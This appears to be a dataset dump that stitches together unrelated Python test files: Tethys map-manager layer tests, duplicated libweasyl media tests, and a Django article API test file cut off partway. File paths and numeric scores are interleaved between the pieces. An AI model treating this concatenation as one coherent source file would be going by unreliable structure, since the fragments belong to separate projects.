layer_variable = 'Bar'
viewparams = 'foo:bar;baz:jar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_wms_layer(
endpoint=endpoint,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
color_ramp_division_kwargs={'min_value': 1, 'max_value': 10, 'color_ramp': 'Blue and Red'},
viewparams=viewparams
)
expected_options = {
'url': endpoint,
'params': {
'LAYERS': layer_name,
'TILED': True,
'TILESORIGIN': '0.0,0.0',
'VIEWPARAMS': viewparams
},
'serverType': 'geoserver',
'crossOrigin': 'anonymous',
'tileGrid': map_manager.DEFAULT_TILE_GRID
}
mock_bvl.assert_called_once()
mock_bvl.called_with(
layer_id='',
layer_name=layer_name,
layer_source='TileWMS',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
extent=None,
visible=True,
public=True,
selectable=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
geometry_attribute='geometry'
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
def test_build_wms_layer_env(self, mock_bvl):
endpoint = 'http://www.example.com/geoserver/wms'
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
env = 'foo:bar;baz:jar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_wms_layer(
endpoint=endpoint,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
color_ramp_division_kwargs={'min_value': 1, 'max_value': 10, 'color_ramp': 'Blue and Red'},
env=env
)
expected_options = {
'url': endpoint,
'params': {
'LAYERS': layer_name,
'TILED': True,
'TILESORIGIN': '0.0,0.0',
'ENV': env
},
'serverType': 'geoserver',
'crossOrigin': 'anonymous',
'tileGrid': map_manager.DEFAULT_TILE_GRID
}
mock_bvl.assert_called_once()
mock_bvl.called_with(
layer_id='',
layer_name=layer_name,
layer_source='TileWMS',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
extent=None,
visible=True,
public=True,
selectable=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
geometry_attribute='geometry'
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
def test_build_mv_layer(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_w_popup_title(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
popup_title = 'Baz'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
popup_title='Baz'
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': popup_title,
'layer_variable': layer_variable,
'toggle_status': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_w_excluded_properties(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
excluded_properties = ['id', 'foo', 'bar', 'baz']
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
excluded_properties=excluded_properties
)
opts = ret['options']
expected_data = {
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True,
'excluded_properties': ['id', 'type', 'layer_name', 'foo', 'bar', 'baz']
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_plottable(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
plottable=True
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name', 'plot'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True,
'plottable': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertDictEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_has_action(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
has_action=True
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True,
'has_action': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_w_extent(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
custom_extent = [1, 2, 3, 4]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
extent=custom_extent
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(custom_extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_w_style_map(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
style_map = {
'Point': {'ol.style.Style': {
'image': {'ol.style.Circle': {
'radius': 5,
'fill': {'ol.style.Fill': {
'color': 'red',
}},
'stroke': {'ol.style.Stroke': {
'color': 'blue',
}}
}}
}},
}
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
style_map=style_map
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
expected_layer_options = {
'visible': True,
'show_download': False,
'style_map': style_map
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual(expected_layer_options, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_not_visible(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
visible=False
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': False, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
@mock.patch('tethys_gizmos.gizmo_options.map_view.log') # mock out geometry attribute warning
def test_build_mv_layer_selectable(self, _):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
selectable=True
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(True, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_w_layer_id(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
layer_id = uuid.uuid4()
layer_id_str = str(layer_id)
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
layer_id=layer_id
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_id_str,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_w_geometry_attributes(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
geometry_attribute = 'geometry'
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
geometry_attribute=geometry_attribute
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_name': layer_name,
'layer_id': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
self.assertEqual(geometry_attribute, ret['geometry_attribute'])
def test_vector_style_map(self):
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.get_vector_style_map()
self.assertIsInstance(ret, dict)
self.assertIn('Point', ret.keys())
self.assertIn('LineString', ret.keys())
self.assertIn('Polygon', ret.keys())
def test_get_plot_for_layer_feature(self):
ret = self.map_manager.get_plot_for_layer_feature(layer_name='layer1', feature_id='F001')
self.assertEqual('F001', ret[1][0]['name'])
self.assertEqual('layer1', ret[2]['xaxis']['title'])
@mock.patch.dict('tethysext.atcore.services.map_manager.MapManagerBase.COLOR_RAMPS', values={'Default': ''}, clear=True) # noqa: E501
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.generate_custom_color_ramp_divisions')
def test_build_legend(self, mock_gccrd):
mock_gccrd.return_value = {'val1': '100', 'val2': '200', 'color1': '#fff100', 'color2': '#ff8c00'}
mock_COLOR_RAMPS = {'Default': ''}
mock_crd_kwargs = {'min_value': 100, 'max_value': 200, 'num_divisions': 2}
mock_layer = {
'layer_name': 'test:layer_name', 'layer_title': 'Test_Title', 'layer_variable': 'test:layer_variable',
'layer_id': '', 'viewparams': None, 'env': None, 'color_ramp_division_kwargs': mock_crd_kwargs
}
expected = {
'legend_id': 'test_layer_variable',
'title': 'Test Title',
'divisions': OrderedDict([(100.0, '#fff100'), (200.0, '#ff8c00')]),
'color_list': mock_COLOR_RAMPS.keys(),
'layer_id': 'test:layer_name',
'min_value': 100,
'max_value': 200,
'color_ramp': 'Default',
'prefix': 'val',
'color_prefix': 'color',
'first_division': 1,
'units': 'Ft',
}
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_legend(mock_layer, units='Ft')
self.assertEqual(ret, expected)
@mock.patch.dict('tethysext.atcore.services.map_manager.MapManagerBase.COLOR_RAMPS', values={'Default': ''}, clear=True) # noqa: E501
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.generate_custom_color_ramp_divisions')
def test_build_legend_with_color_ramp(self, mock_gccrd):
mock_gccrd.return_value = {'val1': '100', 'val2': '200', 'color1': '#fff100', 'color2': '#ff8c00'}
mock_COLOR_RAMPS = {'Default': ''}
mock_crd_kwargs = {'min_value': 100, 'max_value': 200, 'num_divisions': 2, 'color_ramp': 'Default'}
mock_layer = {
'layer_name': 'test:layer_name', 'layer_title': 'Test_Title', 'layer_variable': 'test:layer_variable',
'layer_id': '', 'viewparams': None, 'env': None, 'color_ramp_division_kwargs': mock_crd_kwargs
}
expected = {
'legend_id': 'test_layer_variable',
'title': 'Test Title',
'divisions': OrderedDict([(100.0, '#fff100'), (200.0, '#ff8c00')]),
'color_list': mock_COLOR_RAMPS.keys(),
'layer_id': 'test:layer_name',
'min_value': 100,
'max_value': 200,
'color_ramp': 'Default',
'prefix': 'val',
'color_prefix': 'color',
'first_division': 1,
'units': 'Ft',
}
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_legend(mock_layer, units='Ft')
self.assertEqual(ret, expected) | 0.673084 | 0.281677 |
from __future__ import unicode_literals
import pytest
from libweasyl.test.common import datadir
from libweasyl import images, media
def test_fetch_or_create_disk_media_item(staticdir, db):
"""
``MediaItem.fetch_or_create`` by default creates a disk media item,
populates its attributes, and stores the file on disk.
"""
data = datadir.join('1200x6566.png').read(mode='rb')
item = media.MediaItem.fetch_or_create(data, file_type='png')
assert item.sha256 == 'a5deef985bde4438969b5f74a1864f7a5b1d127df3197b4fadf3f855201278b4'
assert item.file_type == 'png'
assert staticdir.join(
'static', 'media', 'a5', 'de', 'ef', 'a5deef985bde4438969b5f74a1864f7a5b1d127df3197b4fadf3f855201278b4.png'
).read(mode='rb') == data
def test_fetch_or_create_disk_media_item_with_attributes(db):
"""
Attributes can be passed in, which propagate to the media item object.
"""
data = datadir.join('1200x6566.png').read(mode='rb')
item = media.MediaItem.fetch_or_create(data, file_type='png', attributes={'spam': 'eggs'})
assert item.attributes == {'spam': 'eggs'}
def test_fetch_or_create_disk_media_item_with_image(db):
"""
An image can be passed in, which pulls out width/height attributes and
autodetects the file type.
"""
data = datadir.join('1200x6566.png').read(mode='rb')
im = images.from_buffer(data)
item = media.MediaItem.fetch_or_create(data, im=im)
assert item.file_type == 'png'
assert item.attributes == {'width': 1200, 'height': 6566}
def test_fetch_or_create_disk_media_item_with_image_and_attributes(db):
"""
Passing an image and attributes merges the two sets of attributes.
"""
data = datadir.join('1200x6566.png').read(mode='rb')
im = images.from_buffer(data)
item = media.MediaItem.fetch_or_create(data, file_type='png', im=im, attributes={'spam': 'eggs'})
assert item.attributes == {'spam': 'eggs', 'width': 1200, 'height': 6566}
def test_fetch_or_create_disk_media_item_fetches_extant_items(db):
"""
Calling ``MediaItem.fetch_or_create`` with data that's already in the
database gives back the extant media item.
"""
data = datadir.join('1200x6566.png').read(mode='rb')
item1 = media.MediaItem.fetch_or_create(data, file_type='png')
db.flush()
item2 = media.MediaItem.fetch_or_create(data, file_type='png')
assert item1.mediaid == item2.mediaid
def test_fetch_or_create_requires_file_type():
"""
A file type is required if an image isn't being passed in.
"""
pytest.raises(ValueError, media.MediaItem.fetch_or_create, b'spam')
def test_disk_media_item_display_url(db):
"""
Disk media items have a display_url that's fanned out from /static/media.
"""
data = datadir.join('1200x6566.png').read(mode='rb')
item = media.MediaItem.fetch_or_create(data, file_type='png')
assert item.display_url == (
'/static/media/a5/de/ef/a5deef985bde4438969b5f74a1864f7a5b1d127df3197b4fadf3f855201278b4.png')
def test_disk_media_item_display_url_ax_rule(db):
"""
The display_url replaces ``media/ad`` with ``media/ax`` because adblock
sucks.
"""
data = datadir.join('1x70.gif').read(mode='rb')
item = media.MediaItem.fetch_or_create(data, file_type='gif')
assert item.display_url == (
'/static/media/ax/b2/06/adb20677ffcfda9605812f7f47aaa94a9c9b3e1a0b365e43872dc55199f5f224.gif') | libweasyl/libweasyl/test/test_media.py | from __future__ import unicode_literals
import pytest
from libweasyl.test.common import datadir
from libweasyl import images, media
def test_fetch_or_create_disk_media_item(staticdir, db):
"""
``MediaItem.fetch_or_create`` by default creates a disk media item,
populates its attributes, and stores the file on disk.
"""
data = datadir.join('1200x6566.png').read(mode='rb')
item = media.MediaItem.fetch_or_create(data, file_type='png')
assert item.sha256 == 'a5deef985bde4438969b5f74a1864f7a5b1d127df3197b4fadf3f855201278b4'
assert item.file_type == 'png'
assert staticdir.join(
'static', 'media', 'a5', 'de', 'ef', 'a5deef985bde4438969b5f74a1864f7a5b1d127df3197b4fadf3f855201278b4.png'
).read(mode='rb') == data
def test_fetch_or_create_disk_media_item_with_attributes(db):
"""
Attributes can be passed in, which propagate to the media item object.
"""
data = datadir.join('1200x6566.png').read(mode='rb')
item = media.MediaItem.fetch_or_create(data, file_type='png', attributes={'spam': 'eggs'})
assert item.attributes == {'spam': 'eggs'}
def test_fetch_or_create_disk_media_item_with_image(db):
"""
An image can be passed in, which pulls out width/height attributes and
autodetects the file type.
"""
data = datadir.join('1200x6566.png').read(mode='rb')
im = images.from_buffer(data)
item = media.MediaItem.fetch_or_create(data, im=im)
assert item.file_type == 'png'
assert item.attributes == {'width': 1200, 'height': 6566}
def test_fetch_or_create_disk_media_item_with_image_and_attributes(db):
"""
Passing an image and attributes merges the two sets of attributes.
"""
data = datadir.join('1200x6566.png').read(mode='rb')
im = images.from_buffer(data)
item = media.MediaItem.fetch_or_create(data, file_type='png', im=im, attributes={'spam': 'eggs'})
assert item.attributes == {'spam': 'eggs', 'width': 1200, 'height': 6566}
def test_fetch_or_create_disk_media_item_fetches_extant_items(db):
"""
Calling ``MediaItem.fetch_or_create`` with data that's already in the
database gives back the extant media item.
"""
data = datadir.join('1200x6566.png').read(mode='rb')
item1 = media.MediaItem.fetch_or_create(data, file_type='png')
db.flush()
item2 = media.MediaItem.fetch_or_create(data, file_type='png')
assert item1.mediaid == item2.mediaid
def test_fetch_or_create_requires_file_type():
"""
A file type is required if an image isn't being passed in.
"""
pytest.raises(ValueError, media.MediaItem.fetch_or_create, b'spam')
def test_disk_media_item_display_url(db):
"""
Disk media items have a display_url that's fanned out from /static/media.
"""
data = datadir.join('1200x6566.png').read(mode='rb')
item = media.MediaItem.fetch_or_create(data, file_type='png')
assert item.display_url == (
'/static/media/a5/de/ef/a5deef985bde4438969b5f74a1864f7a5b1d127df3197b4fadf3f855201278b4.png')
def test_disk_media_item_display_url_ax_rule(db):
"""
The display_url replaces ``media/ad`` with ``media/ax`` because adblock
sucks.
"""
data = datadir.join('1x70.gif').read(mode='rb')
item = media.MediaItem.fetch_or_create(data, file_type='gif')
assert item.display_url == (
'/static/media/ax/b2/06/adb20677ffcfda9605812f7f47aaa94a9c9b3e1a0b365e43872dc55199f5f224.gif') | 0.64579 | 0.451871 |
from rest_framework import status
import json
from authors.apps.articles.helpers import get_time_to_read_article
from authors.apps.articles.tests.base_tests import BaseTest, API_Reverse
from authors.apps.articles.models import ArticlesModel
class ArticleTests(BaseTest):
def test_anyone_can_get_articles(self):
"""This method tests is anyone can access articles endpoint"""
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_logged_in_user_view_articles(self):
"""This method tests if a logged in user can access articles"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.get(
self.url, format='json', headers={'Authorization': token})
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_user_can_create_article(self):
"""This method tests if a user can create an article"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format='json', HTTP_AUTHORIZATION=token)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_create_articles_unauthorized_user(self):
"""This method checks if an unauthorized user cannot create an article"""
response = self.client.post(self.url, self.article, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_user_can_access_single_article(self):
"""This method checks if a user can access a single article"""
url = self.single_article_details()
response = self.client.get(url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_user_cannot_create_without_title(self):
"""This method tests if a user can post without a title"""
self.article['article'].pop('title')
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format='json', HTTP_AUTHORIZATION=token)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_user_can_update(self):
"""This method checks if a user can update an existing articles"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format='json', HTTP_AUTHORIZATION=token)
slug = response.data['slug']
url = API_Reverse('articles:article-details', {slug: 'slug'})
r = self.client.put(url, data={"article": {"title": "Updated Title", "body": "Updated body"}}, format='json', HTTP_AUTHORIZATION=token)
self.assertIn("Updated Title", json.dumps(r.data))
self.assertEqual(r.status_code, status.HTTP_200_OK)
def test_unauthorised_user_update(self):
"""This method tests if unauthorized user can update existing articles"""
url = self.single_article_details()
self.client.credentials(HTTP_AUTHORIZATION='')
r = self.client.put(url, data={"article": {"title": "Updated Title", "body": "Updated body"}}, format='json')
self.assertEqual(r.status_code, status.HTTP_403_FORBIDDEN)
def test_user_can_delete(self):
"""This method tests if a user can delete articles"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format='json', HTTP_AUTHORIZATION=token)
slug = response.data['slug']
url = API_Reverse('articles:article-details', {slug: 'slug'})
r = self.client.delete(url, format='json', HTTP_AUTHORIZATION=token)
self.assertEqual(r.status_code, status.HTTP_200_OK)
self.assertIn("Article Deleted Successfully", json.dumps(r.data))
def test_unauthorised_user_delete(self):
"""This method tests if a non owner can delete an article"""
url = self.single_article_details()
self.client.credentials(HTTP_AUTHORIZATION='')
response = self.client.delete(url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_article_returns_url(self):
"""This method tests whether the API returns url"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format="json", HTTP_AUTHORIZATION=token)
self.assertIn("url", json.dumps(response.data))
def test_if_article_returns_facebook_url(self):
"""This method tests whether the API returns facebook url"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format="json", HTTP_AUTHORIZATION=token)
self.assertIn("facebook", json.dumps(response.data))
def test_if_article_returns_linkedin_url(self):
"""This method tests whether the API returns linkedin url"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format="json", HTTP_AUTHORIZATION=token)
self.assertIn("Linkedin", json.dumps(response.data))
def test_if_article_returns_twitter_url(self):
"""This method tests whether the API returns twitter url"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format="json", HTTP_AUTHORIZATION=token)
self.assertIn("twitter", json.dumps(response.data))
def test_if_article_returns_mail_url(self):
"""This method tests whether the API returns mail url"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format="json", HTTP_AUTHORIZATION=token)
self.assertIn("mail", json.dumps(response.data)) | authors/apps/articles/tests/test_articles.py | from rest_framework import status
import json
from authors.apps.articles.helpers import get_time_to_read_article
from authors.apps.articles.tests.base_tests import BaseTest, API_Reverse
from authors.apps.articles.models import ArticlesModel
class ArticleTests(BaseTest):
def test_anyone_can_get_articles(self):
"""This method tests is anyone can access articles endpoint"""
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_logged_in_user_view_articles(self):
"""This method tests if a logged in user can access articles"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.get(
self.url, format='json', headers={'Authorization': token})
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_user_can_create_article(self):
"""This method tests if a user can create an article"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format='json', HTTP_AUTHORIZATION=token)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_create_articles_unauthorized_user(self):
"""This method checks if an unauthorized user cannot create an article"""
response = self.client.post(self.url, self.article, format='json')
